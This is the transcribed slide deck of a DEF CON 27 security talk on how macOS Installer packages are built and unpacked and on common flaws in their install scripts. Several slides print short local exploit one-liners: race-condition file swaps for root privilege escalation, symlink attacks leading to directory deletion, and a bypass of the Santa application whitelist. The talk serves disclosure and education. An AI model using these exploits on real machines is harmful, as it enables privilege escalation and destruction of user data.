DEF CON 27 - ANDY GRANT - unpacking pkgs
0 likes100 views
This document provides an overview of macOS Installer packages and common security flaws. It discusses the structure of Installer packages, including the distribution file, package info, bill of materials, payload, and scripts. It explains how packages are unpacked and installed. The document outlines several types of vulnerabilities that can exist in scripts, payloads, and helper applications contained within packages. It provides examples of real vulnerabilities found in packages in the past 8 months, including privilege escalation, symlink abuse, and arbitrary code execution. It demonstrates exploiting a package vulnerability through a proof of concept.
![Into the Wild - Root privilege escalation
● Vulnerability
○ Payload includes /var/tmp/Installerutil
○ Postinstall:
sudo /var/tmp/Installerutil --validate_nsbrandingfile
"$NSBRANDING_JSON_FILE" "$NSINSTPARAM_JSON_FILE"
● Attack - Logged in non-root user attacking IT admin installing software
○ Exploit:
while [ ! -f /var/tmp/Installerutil ]; do :; done; rm
/var/tmp/Installerutil; cp exploit.sh /var/tmp/Installerutil](https://image.slidesharecdn.com/defcon-27-andy-grant-unpacking-pkgs-200410225948/85/DEF-CON-27-ANDY-GRANT-unpacking-pkgs-34-320.jpg)
![Into the Wild - Symlink abuse
● Vulnerability
○ Preinstall:
sudo rm /var/tmp/nsinstallation
○ Postinstall:
sudo chmod 777 /var/tmp/nsinstallation
sudo chown "${CONSOLE_USER}" /var/tmp/nsinstallation
● Attack - Any user/process attacking system administrator
○ Exploit:
touch /var/tmp/nsinstallation; while [ -f /var/tmp/nsinstallation
]; do :; done; ln -s /Applications /var/tmp/nsinstallation](https://image.slidesharecdn.com/defcon-27-andy-grant-unpacking-pkgs-200410225948/85/DEF-CON-27-ANDY-GRANT-unpacking-pkgs-35-320.jpg)
DEF CON 27 - ANDY GRANT - unpacking pkgs
- 1. A look inside macOS Installer packages and common security flaws
- 2. This is Me ● Experience: 11 years professional, 20+ years hobbyist ○ Self-taught → Stanford → iSEC Partners → NCC Group ● Security consultant: appsec focus ○ IC → Management → IC
- 3. This is Me ● Experience: 11 years professional, 20+ years hobbyist ○ Self-taught → Stanford → iSEC Partners → NCC Group ● Security consultant: appsec focus ○ IC → Management → IC ● “Dana Vollmer’s husband” (5x Olympic Gold Medalist)
- 4. This is Me ● Experience: 11 years professional, 20+ years hobbyist ○ Self-taught → Stanford → iSEC Partners → NCC Group ● Security consultant: appsec focus ○ IC → Management → IC ● “Dana Vollmer’s husband” (5x Olympic Gold Medalist) http://www.zimbio.com/Hottest+Olympic+Husbands+and+Boyfriends/ articles/u_giY9WHdG9/Dana+Vollmer+Husband+Andy+Grant
- 5. Overview ● Motivation ● The package ● Unpacking ● What can (and does) go wrong
- 6. Why? ● I’ve got trust issues ○ What’s really going on? ● All in a day’s work ○ Sometimes there’s nothing else to look at
- 7. A look at the package
- 8. The Package - Outside ● Mac OS X Installer flat package (.pkg extension) ○ Little to no official documentation ■ Better unofficial (but incomplete) documentation https://matthew-brett.github.io/docosx/flat_packages.html http://s.sudre.free.fr/Stuff/Ivanhoe/FLAT.html ● eXtensible ARchive (XAR) ● Helpful tools ○ macOS pre-installed pkgutil ○ Suspicious Package: https://www.mothersruin.com/software/SuspiciousPackage/
- 10. Unpacking ● The easy way pkgutil --expand "/path/to/package.pkg" "/path/to/output/directory"
- 11. Unpacking ● The easy way pkgutil --expand "/path/to/package.pkg" "/path/to/output/directory" ● The hacker way mkdir -p "/path/to/output/directory" cd "/path/to/output/directory" xar -xf "/path/to/package.pkg"
- 12. The Package - Inside ├── Distribution XML document text, ASCII text ├── Resources directory └── <package>.pkg directory ├── Bom Mac OS X bill of materials (BOM) file ├── PackageInfo XML document text, ASCII text ├── Payload gzip compressed data, from Unix └── Scripts gzip compressed data, from Unix
- 13. The Package - Distribution, PackageInfo, Bom ● Distribution (XML + JavaScript) ○ Customizations (title, welcome text, readme, background, restart, etc) ○ Script / installation checks (InstallerJS)
- 14. The Package - Distribution, PackageInfo, Bom ● Distribution (XML + JavaScript) ○ Customizations (title, welcome text, readme, background, restart, etc) ○ Script / installation checks (InstallerJS) ● PackageInfo (XML) ○ Information on the package ○ Install requirements ○ Installation location ○ Paths to scripts to run
- 15. The Package - Distribution, PackageInfo, Bom ● Distribution (XML + JavaScript) ○ Customizations (title, welcome text, readme, background, restart, etc) ○ Script / installation checks (InstallerJS) ● PackageInfo (XML) ○ Information on the package ○ Install requirements ○ Installation location ○ Paths to scripts to run ● Bill of materials (bom) ○ List of files to install, update, or remove ○ File permissions, owner/group, size, etc
- 16. The Package - Payload, Scripts ● Payload (CPIO archive, gzip) ○ The files to be installed ○ Extracted to the install location specified in PackageInfo
- 17. The Package - Payload, Scripts ● Payload (CPIO archive, gzip) ○ The files to be installed ○ Extracted to the install location specified in PackageInfo ● Scripts (CPIO archive, gzip) ○ Pre- and post-install scripts and additional resources ■ Bash, Python, Perl, <executable + #!> ○ Extracted to random temp directory for execution
- 18. Unpacking - Scripts ● gzip’d cpio files cat Scripts | gzip -dc | cpio -i
- 19. Unpacking - Scripts ● gzip’d cpio files cat Scripts | gzip -dc | cpio -i ● But cpio knows how to handle compressed files natively cpio -i < Scripts
- 20. Unpacking - Scripts ● gzip’d cpio files cat Scripts | gzip -dc | cpio -i ● But cpio knows how to handle compressed files natively cpio -i < Scripts If you did the easy way (pkgutil --expand) this was done for you and Scripts is a directory containing the archive’s contents
- 21. Unpacking - Payload ● Same as Scripts cpio -i < Payload
- 22. Unpacking - Payload ● Same as Scripts cpio -i < Payload ● Sometimes contains more .pkg files; recurse!
- 23. Unpacking - Payload ● Same as Scripts cpio -i < Payload ● Sometimes contains more .pkg files; recurse! Unlike Scripts, pkgutil --expand DOES NOT expand Payload for you
- 24. What happens when I double click the .pkg?
- 25. Installation - Order of operations (roughly) 1. Installation checks, specified in Distribution: <installation-check script="installCheck();"/>
- 26. Installation - Order of operations (roughly) 1. Installation checks, specified in Distribution: <installation-check script="installCheck();"/> 2. Preinstall, specified in PackageInfo: <scripts> <preinstall file="./preinstall"/> </scripts>
- 27. Installation - Order of operations (roughly) 1. Installation checks, specified in Distribution: <installation-check script="installCheck();"/> 2. Preinstall, specified in PackageInfo: <scripts> <preinstall file="./preinstall"/> </scripts> 3. Extract Payload to install-location from PackageInfo
- 28. Installation - Order of operations (roughly) 1. Installation checks, specified in Distribution: <installation-check script="installCheck();"/> 2. Preinstall, specified in PackageInfo: <scripts> <preinstall file="./preinstall"/> </scripts> 3. Extract Payload to install-location from PackageInfo 4. Postinstall, specified in PackageInfo: <scripts> <postinstall file="./postinstall"/> </scripts>
- 29. What can go wrong?
- 30. Security - Where are the vulns? ● Scripts ○ Preinstall ○ Postinstall ○ Helper scripts ● Payload ○ Additional scripts (application helpers, uninstall scripts, etc) ○ Normal native app issues (brush up on your reversing skills!) ■ Binary ■ Libraries ■ Kernel modules
- 31. Security - Types of vulns ● TOCTOU (minus the TOC) ● /tmp isn’t safe?! ○ What about for reads? Nope ○ What about for writes? Nope ○ What about for executes? Nope ● Access for all! ○ chmod 777
- 32. Real vulns in real .pkgs (in the past 8 months)
- 33. Into the Wild ● Root privilege escalation ● Symlink abuse ● Privilege escalation ● Arbitrary directory deletion ● Arbitrary code execution
- 34. Into the Wild - Root privilege escalation ● Vulnerability ○ Payload includes /var/tmp/Installerutil ○ Postinstall: sudo /var/tmp/Installerutil --validate_nsbrandingfile "$NSBRANDING_JSON_FILE" "$NSINSTPARAM_JSON_FILE" ● Attack - Logged in non-root user attacking IT admin installing software ○ Exploit: while [ ! -f /var/tmp/Installerutil ]; do :; done; rm /var/tmp/Installerutil; cp exploit.sh /var/tmp/Installerutil
- 35. Into the Wild - Symlink abuse ● Vulnerability ○ Preinstall: sudo rm /var/tmp/nsinstallation ○ Postinstall: sudo chmod 777 /var/tmp/nsinstallation sudo chown "${CONSOLE_USER}" /var/tmp/nsinstallation ● Attack - Any user/process attacking system administrator ○ Exploit: touch /var/tmp/nsinstallation; while [ -f /var/tmp/nsinstallation ]; do :; done; ln -s /Applications /var/tmp/nsinstallation
- 36. Into the Wild - Privilege escalation ● Vulnerability ○ Preinstall: rm -rf /tmp/7z unzipresult=$(/usr/bin/unzip -q "$APP_FOLDER/7z.zip" -d "/tmp") un7zresult=$(/tmp/7z x "${APP_FOLDER}/xy.7z" -o "$APP_FOLDER") ● Attack - Any user/process attacking installing user ○ Exploit: cp exploit.sh /tmp/7z
- 37. Into the Wild - Arbitrary directory deletion ● Vulnerability ○ Helper script inside Payload: # Clean up garbage rm -rf /tmp/sdu/* rmdir /tmp/sdu/ ● Attack - Any user/process attacking user running installed application ○ Exploit: ln -s /Users/victim /var/sdu
- 38. Into the Wild - Arbitrary code execution ● Vulnerability ○ PackageInfo: <pkg-info install-location="/tmp/RazerSynapse" auth="root"> ○ Postinstall: cd /tmp/RazerSynapse for package in /tmp/RazerSynapse/*.pkg do installer -pkg "${package}" -target /
- 39. Into the Wild - Arbitrary code execution ● Vulnerability ○ PackageInfo: <pkg-info install-location="/tmp/RazerSynapse" auth="root"> ○ Postinstall: cd /tmp/RazerSynapse for package in /tmp/RazerSynapse/*.pkg do installer -pkg "${package}" -target /
- 40. Into the Wild - Arbitrary code execution ● DEMO! ○ Download target package ○ Extract files from .pkg ○ Check Distribution for installation-checks / script ○ Check PackageInfo for install-location and scripts ○ Extract files from Scripts ○ Check scripts for vulns ○ Craft exploit for discovered vuln ○ “Deliver” exploit and wait for installation ○ Install package ○ Profit!
- 41. Into the Wild - Demo https://www.youtube.com/watch?v=OvlSLCVgaMs
- 42. That Was Unexpected ● “No payload” packages leave no receipts ○ Nothing was “installed”, so no system record of the installation occurring ○ For minimal clicks, do everything during the installation checks ● Application Whitelisting (Google’s Santa) bypass: https://www.praetorian.com/blog/bypassing-google-santa-application-whitelisting-on-macos-part-1 ○ On macOS, app whitelisting is at the execve level, and installer is whitelisted ○ Code run via installation checks and pre- and post-install scripts run as installer